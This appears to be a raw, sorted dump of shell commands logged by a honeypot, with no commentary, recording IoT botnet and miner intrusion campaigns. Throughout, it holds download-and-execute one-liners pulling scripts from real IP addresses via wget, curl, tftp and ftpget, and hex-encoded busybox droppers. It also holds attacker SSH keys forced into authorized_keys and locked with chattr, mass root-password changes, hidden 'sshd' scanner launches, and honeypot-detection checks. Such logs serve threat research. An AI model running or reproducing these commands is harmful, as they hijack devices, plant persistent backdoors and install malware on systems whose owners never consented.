( (seconds%3600 ( (seconds%86400 (seconds%3600 (seconds%86400 (seconds/86400 (secondsStr /bin/busybox BKPNE /bin/busybox BPTVC /bin/busybox BYHJE /bin/busybox CAKKO /bin/busybox CGVDK /bin/busybox CHVLO /bin/busybox CUUBO /bin/busybox EQUDF /bin/busybox ERKXD /bin/busybox GOVLG /bin/busybox HBLEA /bin/busybox HFEJO /bin/busybox HVYYG /bin/busybox HXPNP /bin/busybox HZICM /bin/busybox IKOZR /bin/busybox IQESZ /bin/busybox IRCFT /bin/busybox JDPWY /bin/busybox KIAZT /bin/busybox LRRIK /bin/busybox MSPTS /bin/busybox MWKTV /bin/busybox NUBSW /bin/busybox OOAXY /bin/busybox PJQBT /bin/busybox PWKWR /bin/busybox QMOKR /bin/busybox RTIAJ /bin/busybox TDSCX /bin/busybox TXDCO /bin/busybox UYHIC /bin/busybox VAJMK /bin/busybox VYDBV /bin/busybox ZNDCA /bin/busybox cat /proc/self/exe || cat /bin/echo /bin/busybox cat /proc/self/exe || cat /proc/self/exe /bin/busybox chmod 777 .b /bin/busybox chmod 777 .d /bin/busybox chmod 777 .d; ./.d > .b; /bin/busybox chmod 777 .b; ./.b matrix /bin/busybox echo -en '\x20\x24\x53\x20\x2d\x20\x70\x7c\x7c\x62\x75\x73\x79\x62\x6f\x78\x20\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x24\x53\x2f'>>.d && /bin/busybox echo -e '\x46\x49\x4e' /bin/busybox echo -en '\x2f\x70\x20\x2d\x4f\x2d\x7c\x7c\x63\x75\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x24\x53\x2f\x70\x7c\x7c\x66\x74\x70\x67\x65\x74'>>.d && /bin/busybox echo -e '\x46\x49\x4e' /bin/busybox echo -en '\x53\x3d\x31\x30\x34\x2E\x31\x39\x34\x2E\x39\x2E\x31\x32\x37\x3b\x20\x28\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x24\x53'>.d && /bin/busybox echo -e '\x46\x49\x4e' /bin/busybox echo -en '\x70\x20\x2d\x4f\x2d\x7c\x7c\x62\x75\x73\x79\x62\x6f\x78\x20\x63\x75\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x24\x53\x2f\x70\x7c'>>.d && /bin/busybox echo -e '\x46\x49\x4e' /bin/busybox echo -en '\x7c\x62\x75\x73\x79\x62\x6f\x78\x20\x66\x74\x70\x67\x65\x74\x20\x24\x53\x20\x2d\x20\x70\x29'>>.d && /bin/busybox echo -e '\x46\x49\x4e' /bin/busybox wget --help; /bin/busybox ftpget --help; /bin/busybox echo -e '\x67\x61\x79\x66\x67\x74'; /bin/busybox wget;/bin/busybox echo -ne '\x45\x4c\x46' /ip cloud print 1 > .b > .d > a6s87d6as8zdgtdyas.ini >/dev/.a && cd /dev/; rm -rf .a >/dev/shm/.a && cd /dev/shm/; rm -rf .a >/etc/.a && cd /etc/; rm -rf .a >/mnt/.a && cd /mnt/; rm -rf .a >/tmp/.a && cd /tmp/; rm -rf .a >/usr/.a && cd /usr/; rm -rf .a >/var/.a && cd /var/; rm -rf .a >/var/home/user/fw/.a && cd /var/home/user/fw/; rm -rf .a >/var/run/.a && cd /var/run/; rm -rf .a >>!A@/!'8ELF't{~ >A@/1'8ELF7} >D6@/XJ'8 >yoA@/;'8ELFP;i2 ? DownLoadServer="https://datahub.haohuan.com/"; arch=$(uname -m); arch=${arch/x86_64/amd64}; arch=${arch/i?86/386}; arch=${arch/armv*/arm}; arch=${arch/aarch64/arm64}; arch=${arch/arm64/arm64}; [[ $arch == mips ]] && arch=$(lscpu 2>/dev/null | grep -q "Little Endian" && echo mipsle || echo mips); url="${DownLoadServer}linux_${arch}"; (curl -s -o "linux_${arch}" "$url" || wget -q -O "linux_${arch}" "$url") && chmod +x "linux_${arch}" && ./"linux_${arch}" & awk {u=int($1 cat .sbmg cat /bin/echo cat /bin/echoQtd#UPX! cat /bin/ls|head -n 1 cat /bin/ls|more cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps cat /proc/cpuinfo cat /proc/cpuinfo | grep model | grep name | wc -l cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' cat /proc/cpuinfo | grep name | wc -l cat /proc/mounts | grep tmpfs | grep -v noexec | cut -d -f 2 cat /proc/mounts; /bin/busybox BKPNE cat /proc/mounts; /bin/busybox BPTVC cat /proc/mounts; /bin/busybox BYHJE cat /proc/mounts; /bin/busybox CAKKO cat /proc/mounts; /bin/busybox CGVDK cat /proc/mounts; /bin/busybox CHVLO cat /proc/mounts; /bin/busybox CUUBO cat /proc/mounts; /bin/busybox EQUDF cat /proc/mounts; /bin/busybox ERKXD cat /proc/mounts; /bin/busybox GOVLG cat /proc/mounts; /bin/busybox HBLEA cat /proc/mounts; /bin/busybox HFEJO cat /proc/mounts; /bin/busybox HVYYG cat /proc/mounts; /bin/busybox HXPNP cat /proc/mounts; /bin/busybox HZICM cat /proc/mounts; /bin/busybox IKOZR cat /proc/mounts; /bin/busybox IQESZ cat /proc/mounts; /bin/busybox IRCFT cat /proc/mounts; /bin/busybox JDPWY cat /proc/mounts; /bin/busybox KIAZT cat /proc/mounts; /bin/busybox LRRIK cat /proc/mounts; /bin/busybox MSPTS cat /proc/mounts; /bin/busybox MWKTV cat /proc/mounts; /bin/busybox NUBSW cat /proc/mounts; /bin/busybox OOAXY cat /proc/mounts; /bin/busybox PJQBT cat /proc/mounts; /bin/busybox PWKWR cat /proc/mounts; /bin/busybox QMOKR cat /proc/mounts; /bin/busybox RTIAJ cat /proc/mounts; /bin/busybox TDSCX cat /proc/mounts; /bin/busybox TXDCO cat /proc/mounts; /bin/busybox UYHIC cat /proc/mounts; /bin/busybox VAJMK cat /proc/mounts; /bin/busybox VYDBV cat /proc/mounts; /bin/busybox ZNDCA cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1 cat /proc/uptime | cut -d -f1 | cut -d. -f1 cat i > ii cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox BKPNE cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox BPTVC cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox BYHJE cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox CAKKO cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox CGVDK cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox CHVLO cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox CUUBO cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox EQUDF cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox ERKXD cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox GOVLG cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox HBLEA cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox HFEJO cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox HVYYG cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox HXPNP cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox HZICM cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox IKOZR cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox IQESZ cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox IRCFT cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox JDPWY cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox KIAZT cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox LRRIK cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox MSPTS cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox MWKTV cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox NUBSW cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox OOAXY cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox PJQBT cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox PWKWR cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox QMOKR cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox RTIAJ cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox TDSCX cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox TXDCO cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox UYHIC cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox VAJMK cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox VYDBV cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox ZNDCA cd /tmp || cd /var || cd /dev || cd /etc cd /tmp || cd /var/ || cd /var/run || cd /mnt || cd /root || cd /; rm -rf i; wget http://192.168.1.1:8088/i; curl -O http://192.168.1.1:8088/i; /bin/busybox wget http://192.168.1.1:8088/i; chmod 777 i || (cp /bin/ls ii;cat i>ii;rm i;cp ii i;rm ii); ./i; echo -e '\x63\x6F\x6E\x6E\x65\x63\x74\x65\x64' cd /tmp || cd /var/ || cd /var/run || cd /mnt || cd /root || cd /;/bin/busybox echo -ne '\x45\x4c\x46' cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://196.251.87.166/1.sh; curl -O http://196.251.87.166/1.sh; chmod 777 1.sh; sh 1.sh; tftp 196.251.87.166 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 196.251.87.166; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 196.251.87.166 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3.sh 2.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://202.155.94.168/ohshit.sh; curl -O http://202.155.94.168/ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp 202.155.94.168 -c get ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp -r ohshit2.sh -g 202.155.94.168; chmod 777 ohshit2.sh; sh ohshit2.sh; ftpget -v -u anonymous -p anonymous -P 21 202.155.94.168 ohshit1.sh ohshit1.sh; sh ohshit1.sh; rm -rf ohshit.sh ohshit.sh ohshit2.sh ohshit1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;wget http://160.187.246.23/all.sh || curl -O http://160.187.246.23/all.sh || busybox wget http://160.187.246.23/all.sh || busybox tftp 160.187.246.23 -c get all.sh || busybox tftp -r all.sh -g 160.187.246.23 -l all.sh || busybox ftpget -v -u anonymous -p anonymous -P 21 160.187.246.23 all.sh all.sh || tftp 160.187.246.23 -c get all.sh || tftp -r all.sh -g 160.187.246.23 -l all.sh || ftpget -v -u anonymous -p anonymous -P 21 160.187.246.23 all.sh all.sh;chmod 777 all.sh;sh ./all.sh;rm -rf all.sh cd /tmp; wget http://103.176.20.59/ssh.sh -O- |sh;curl -o http://103.176.20.59/ssh.sh -O-|sh; tftp -r ssh.sh -g 103.176.20.59; chmod 777 ssh.sh; sh ssh.sh;\n cd /tmp; wget http://2.58.113.219/wget.sh -O- |sh;curl -o http://2.58.113.219/wget.sh -O-|sh; chmod 777 wget.sh; sh wget.sh;\n cd /tmp; wget http://2.58.113.219/wget.sh -O- |sh;curl -o http://2.58.113.219/wget.sh -O-|sh;\n cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh cd ~ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ cd ~; chattr -ia .ssh; lockr -ia .ssh chmod +x ./.1411309184620360364/sshd;nohup ./.1411309184620360364/sshd 107.174.131.51 103.101.52.115 111.170.168.6 5.189.157.5 45.45.239.129 45.150.33.79 62.210.130.180 157.255.155.179 191.96.11.220 45.251.115.48 107.172.235.77 107.172.50.186 219.153.109.99 47.79.43.177 47.109.28.100 186.13.21.145 46.38.143.201 38.242.249.184 159.203.90.99 170.84.39.236 192.227.247.47 192.3.232.251 120.71.0.7 47.111.15.68 66.206.224.115 23.94.70.51 82.180.154.188 14.103.158.69 112.217.86.2 147.182.249.14 158.51.96.38 207.154.207.65 139.59.253.66 117.173.76.160 219.153.125.102 107.172.250.121 86.54.42.8 43.247.68.87 79.120.74.12 103.174.130.66 50.3.189.189 103.186.97.118 188.166.211.175 103.192.198.89 106.13.59.117 85.9.121.232 138.197.74.207 140.249.192.235 47.96.158.82 160.19.205.25 41.225.238.233 & chmod +x ./.2084837515221788587/sshd;nohup ./.2084837515221788587/sshd 194.163.145.99 47.94.87.144 42.121.57.140 185.105.116.131 148.72.168.29 212.23.214.248 185.103.103.83 50.3.189.190 8.135.238.15 162.19.102.3 103.77.247.203 5.167.76.48 116.142.242.168 45.149.207.114 190.123.74.50 47.84.77.51 161.97.103.140 92.116.174.21 96.78.175.36 106.75.68.22 193.151.154.160 107.175.224.72 198.144.176.83 103.174.9.66 62.74.180.63 1.62.252.20 124.225.67.32 5.75.206.212 140.249.24.66 182.118.184.104 61.169.146.123 39.164.232.214 146.56.108.6 101.91.181.235 79.120.74.12 5.198.168.202 188.166.211.175 109.123.246.98 85.198.14.16 192.227.247.35 47.94.158.98 103.192.198.89 111.170.168.6 43.239.110.69 85.9.122.24 103.28.53.102 194.1.184.72 217.79.189.145 222.187.215.194 103.55.36.22 107.175.212.207 & chmod +x ./.366486876366571827/sshd;nohup ./.366486876366571827/sshd 42.6.176.197 64.227.141.251 94.46.171.222 175.165.145.207 103.232.21.226 117.187.109.152 124.225.67.32 8.142.84.3 42.6.176.92 47.79.43.177 185.141.218.252 94.131.118.175 157.230.45.129 120.71.0.7 42.6.177.162 188.166.211.175 163.172.34.113 61.53.69.210 42.6.177.62 42.6.177.98 42.6.177.137 47.94.158.98 140.249.211.21 85.203.43.4 101.36.228.201 195.158.29.214 211.154.25.163 123.139.118.17 159.203.108.2 175.148.101.155 45.151.183.109 1.62.252.20 91.132.163.124 154.211.13.102 118.69.136.214 152.110.62.105 42.6.177.234 178.128.253.94 152.42.191.202 114.205.67.42 175.165.161.44 42.6.177.17 42.6.177.227 206.189.94.54 124.225.88.88 125.88.174.233 103.145.145.82 36.150.215.137 152.42.163.97 81.162.54.144 103.55.36.22 & chmod +x ./.4175163115793566559/sshd;nohup ./.4175163115793566559/sshd 221.14.147.153 212.115.54.22 42.193.15.51 125.44.160.53 195.158.29.214 148.72.168.29 112.171.213.120 62.171.162.142 138.197.163.192 139.59.253.66 187.49.144.147 47.100.121.202 156.232.10.81 209.126.11.109 123.139.118.17 101.36.109.45 114.96.84.122 159.203.108.2 190.123.74.50 89.43.78.180 112.4.175.171 103.145.145.78 45.45.239.129 62.76.26.201 152.32.133.47 61.53.69.210 45.59.171.54 39.164.232.214 8.153.194.253 222.211.93.5 84.200.91.15 14.103.158.69 62.84.184.111 176.65.149.18 147.93.62.20 50.7.238.178 156.229.233.208 116.128.243.59 147.45.66.200 196.57.217.2 82.180.154.188 103.174.130.143 45.159.189.193 195.154.203.16 42.84.84.197 39.96.177.218 172.86.70.95 211.154.25.163 161.132.56.248 36.163.199.18 47.79.43.177 & chmod +x ./.5039203499273574195/xinetd;nohup ./.5039203499273574195/xinetd & chmod +x ./.5139919110999107421/sshd;nohup ./.5139919110999107421/sshd 83.168.69.143 51.81.116.121 54.218.69.206 125.87.91.29 125.87.85.142 103.234.237.22 175.148.96.136 217.79.189.145 103.75.125.133 82.156.38.8 34.244.27.115 13.231.135.146 108.165.164.143 193.111.236.229 113.229.58.156 192.227.153.63 125.87.81.36 56.125.148.70 125.44.160.237 220.192.228.195 123.30.140.225 43.143.159.39 66.206.224.115 13.203.105.238 188.166.249.22 125.87.80.253 16.162.163.175 42.6.177.246 125.87.89.102 69.197.155.210 64.188.69.146 125.87.90.229 175.165.147.26 125.87.84.155 1.195.60.21 113.229.57.13 113.229.60.53 13.115.130.247 5.135.34.71 13.218.130.198 125.87.95.91 125.87.86.252 36.152.32.178 42.6.177.84 175.165.164.127 117.236.124.182 125.87.80.223 175.148.99.229 54.178.90.203 118.178.183.89 62.210.130.180 & chmod +x ./.5683576601125727217/sshd;nohup ./.5683576601125727217/sshd 5.180.81.85 113.229.59.222 112.4.175.171 220.192.230.43 175.165.176.148 60.20.198.124 42.6.176.25 119.112.90.20 13.115.45.156 175.165.164.146 113.229.56.222 113.229.60.111 103.232.21.226 42.6.176.160 50.7.238.178 175.175.223.128 42.6.177.180 42.6.176.69 175.165.164.155 175.165.191.169 42.6.176.201 175.165.145.3 175.165.176.121 113.229.63.231 95.46.74.243 176.65.149.18 113.229.56.220 42.6.177.59 34.241.4.65 193.108.127.41 175.165.178.224 175.165.160.10 42.6.177.172 113.226.107.46 42.6.177.64 77.221.138.241 175.165.161.155 42.6.177.169 220.192.231.186 175.165.144.83 117.187.109.166 157.230.178.141 175.165.164.130 113.99.201.87 175.165.166.77 175.165.188.51 52.91.199.247 42.6.177.48 45.59.171.54 81.177.166.67 175.148.100.107 & chmod +x ./.5944640405304960359/sshd;nohup ./.5944640405304960359/sshd & chmod +x ./.8439449654653827479/sshd;nohup ./.8439449654653827479/sshd 78.107.31.92 45.207.201.42 175.47.180.25 60.165.127.100 88.209.249.106 91.99.186.181 103.145.145.82 47.96.158.82 223.75.204.39 43.247.68.87 62.60.232.169 83.168.95.48 163.172.34.113 185.231.181.100 157.255.155.179 113.7.221.72 47.94.87.144 60.165.126.250 62.210.130.180 180.178.189.2 160.19.205.25 1.195.60.11 89.163.135.163 176.120.17.70 200.106.249.210 101.36.109.45 94.182.147.147 96.78.175.36 178.239.157.250 23.229.82.50 89.233.193.146 117.149.247.143 103.126.172.10 8.135.238.15 5.75.206.212 107.150.121.86 111.20.120.70 154.89.201.181 5.167.76.48 1.62.252.20 103.28.53.102 31.97.158.25 45.149.207.114 159.203.90.99 62.72.1.151 124.225.88.88 167.86.78.165 23.146.184.59 110.49.99.110 14.103.158.69 5.189.157.5 & chmod +x ./.923626568407261109/sshd;nohup ./.923626568407261109/sshd 175.165.166.77 175.175.221.88 175.165.161.34 160.30.200.25 161.132.56.248 190.123.74.50 175.165.180.123 220.192.229.228 175.165.191.186 113.229.60.53 175.165.181.34 115.190.97.236 161.248.188.78 45.142.107.198 113.229.59.112 45.87.104.88 175.174.135.147 101.36.109.45 119.112.90.20 175.165.176.36 220.192.230.165 52.91.199.247 175.165.182.203 51.89.61.162 160.191.243.63 220.181.172.244 220.192.228.250 175.165.189.228 119.112.88.68 42.6.177.22 185.185.68.57 79.42.148.167 175.148.97.61 175.165.180.59 220.192.231.109 42.6.177.121 42.6.177.39 60.16.8.124 113.229.60.40 199.47.144.34 113.229.59.144 220.192.231.212 185.143.179.228 113.229.58.114 42.6.176.98 112.4.175.171 175.148.96.136 148.72.168.29 113.229.62.183 52.195.5.164 113.229.61.207 & chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A" chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a chmod 777 .b chmod 777 .d config terminal cp /bin/ls ii cp /bin/sh .b cp /bin/sh .d cp ii i cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo ""); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo ""); if [ -z "$cpu" ] || [ -z "$memtotal" ]; then; echo "honeypot"; else; echo "valid"; fi crontab -l curl -o /dev/null http://m.news.cn/ curl -o /dev/null https://ladamoscow.com/ curl -o /dev/null https://ms.unkjd.games curl -s -o linux_${arch} $url dd bs=1 count=1911588 > /tmp/RamFxG0cn8 dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s df -h | head -n 2 | awk 'FNR == 2 {print $2;}' echo echo "cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps" | sh echo "root:02DMkw9YzRFG"|chpasswd|bash echo "root:0JfITIaLHo9J"|chpasswd|bash echo "root:0TUaU9fkJQ3g"|chpasswd|bash echo "root:20EO6eDeqg36"|chpasswd|bash echo "root:2MqhjHHcNQ69"|chpasswd|bash echo "root:2Z161YB84zZ7"|chpasswd|bash echo "root:2c9bagar0h4I"|chpasswd|bash echo "root:2tHvM7qIYIuq"|chpasswd|bash echo "root:3BBkjaIL9Nzu"|chpasswd|bash echo "root:42LsJEa6wL9x"|chpasswd|bash echo "root:4ZOfAPmI5DS2"|chpasswd|bash echo "root:5djq1VXFGoyE"|chpasswd|bash echo "root:6pa5dDKlWwOv"|chpasswd|bash echo "root:6yD9PWYrMzxC"|chpasswd|bash echo "root:89D0cnJRaw4P"|chpasswd|bash echo "root:BUot4kr5NPQ5"|chpasswd|bash echo "root:BipOBw4ozgC2"|chpasswd|bash echo "root:CSAO9khaiFKL"|chpasswd|bash echo "root:CTc2lXXgcfmt"|chpasswd|bash echo "root:D3uXyshy9x0u"|chpasswd|bash echo "root:DovOlC2Z8fr6"|chpasswd|bash echo "root:Fy5R95pQf0ag"|chpasswd|bash echo "root:GGl1WnyhjFsW"|chpasswd|bash echo "root:GHc7i5RYIyVc"|chpasswd|bash echo "root:H2ce5kOREv99"|chpasswd|bash echo "root:H4brKYsEDRDc"|chpasswd|bash echo "root:HaBdaAUuph1d"|chpasswd|bash echo "root:KoH8epCWlMwZ"|chpasswd|bash echo "root:MD1yueywtam6"|chpasswd|bash echo "root:MX3aYPPJ05Zn"|chpasswd|bash echo "root:MjYaDvCa6yOG"|chpasswd|bash echo "root:N8c2Yx2AHbWs"|chpasswd|bash echo "root:ORPdo9RntAYw"|chpasswd|bash echo "root:P2hVoP3YVtX9"|chpasswd|bash echo "root:P2o6OSBXwvZX"|chpasswd|bash echo "root:QviIIrSIQcvk"|chpasswd|bash echo "root:RJnhKwYvpUkp"|chpasswd|bash echo "root:S6GcRuLD3In5"|chpasswd|bash echo "root:SPzfkRfsaCIk"|chpasswd|bash echo "root:T33kGQc5f4db"|chpasswd|bash echo "root:T6is7WVvOHlg"|chpasswd|bash echo "root:U8uvuJ3DvJmW"|chpasswd|bash echo "root:UTwXRf1OZ39P"|chpasswd|bash echo "root:VL3IZ95lZ9rC"|chpasswd|bash echo "root:WXfl6cjpeN81"|chpasswd|bash echo "root:XenVR46WHxck"|chpasswd|bash echo "root:YRJMbkielRpv"|chpasswd|bash echo "root:YimRuYkOqWhS"|chpasswd|bash echo "root:Z3BsdFgKDYnv"|chpasswd|bash echo "root:ZG38ei9Q8BJF"|chpasswd|bash echo "root:ZN2JeAsfjapT"|chpasswd|bash echo "root:ZYAmhjsMcSf1"|chpasswd|bash echo "root:ZmauNJihTadr"|chpasswd|bash echo "root:baMjV8hspAGn"|chpasswd|bash echo "root:ckFBWKvPpOdx"|chpasswd|bash echo "root:d6WJcKP38ojQ"|chpasswd|bash echo "root:dIR3wIhvo3gJ"|chpasswd|bash echo "root:dq4uvuGCUVkG"|chpasswd|bash echo "root:duyWHzp711dd"|chpasswd|bash echo "root:eJhP8pewI80y"|chpasswd|bash echo "root:fETnbn4t5LWV"|chpasswd|bash echo "root:gKP0zZKuBznL"|chpasswd|bash echo "root:guS0vL6WFsci"|chpasswd|bash echo "root:iQbxID48qaw1"|chpasswd|bash echo "root:jgE4MTs3GPWj"|chpasswd|bash echo "root:kEqoCtPlfTnr"|chpasswd|bash echo "root:mFgUTwtxiBnA"|chpasswd|bash echo "root:nBPD5tPZgfch"|chpasswd|bash echo "root:nbh0iXaQyE8o"|chpasswd|bash echo "root:nzns88cHVxpK"|chpasswd|bash echo "root:pC0EuRiDplQz"|chpasswd|bash echo "root:s1GD55K30UOV"|chpasswd|bash echo "root:tIZ2Od2k8soC"|chpasswd|bash echo "root:ugvAW0qSTFVM"|chpasswd|bash echo "root:w5I4G5ZenOYg"|chpasswd|bash echo "root:xUAMb4JzyUUS"|chpasswd|bash echo "root:xXJTBhgRJRWN"|chpasswd|bash echo "root:y6LlTePu1xM1"|chpasswd|bash echo "root:ySlNjLfLnChI"|chpasswd|bash echo "root:yTLdfnaP2P9M"|chpasswd|bash echo "root:zi6e3LTAIUki"|chpasswd|bash echo -e "\x6F\x6B" echo -e '\x68\x69\x7A\x70\x71' echo -e '\x74\x66\x73\x74\x70' echo 1 > /dev/null && cat /bin/echo echo 1 > /dev/null && cat /bin/echoQtd#UPX! echo ECHO_TEST_1756248119157179010 echo ECHO_TEST_1756248483615519374 echo ECHO_TEST_1756249189738462412 echo ECHO_TEST_1756419902401900034 echo ECHO_TEST_1756461837363337115 echo ECHO_TEST_1756469673370675758 echo Hi | cat -n echo IoT_ACCESS_VERIFIED echo SCANNER_TEST echo TEST echo cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; busybox wget http://213.232.114.169/d.sh; wget http://213.232.114.169/d.sh; curl -O http://213.232.114.169/d.sh; chmod 777 d.sh; sh d.sh; tftp 213.232.114.169 -c get d.sh; chmod 777 d.sh; sh d.sh; tftp -r d2.sh -g 213.232.114.169; chmod 777 d2.sh; sh d2.sh; ftpget -v -u anonymous -p anonymous -P 21 213.232.114.169 d1.sh d1.sh; sh d1.sh; rm -rf d.sh d.sh d2.sh d1.sh; rm -rf * echo mips echo mipsle enable env | head -10 exit export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s="";if(d>0)s=s d"d";if(h>0){if(s!="")s=s", ";s=s h"h"}if(m>0||s==""){if(s!="")s=s, ";s=s m"m"}print s}' /proc/uptime 2>/dev/null); [ -z "$uptime" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n "$secondsStr" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime="" && [ $d -gt 0 ] && uptime="${uptime}${d}d" && [ $h -gt 0 ] && { [ -n "$uptime" ] && uptime="$uptime, "; uptime="${uptime}${h}h"; } && { [ $m -gt 0 ] || [ -z "$uptime" ]; } && { [ -n "$uptime" ] && uptime="$uptime, "; uptime="${uptime}${m}m"; }; cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; 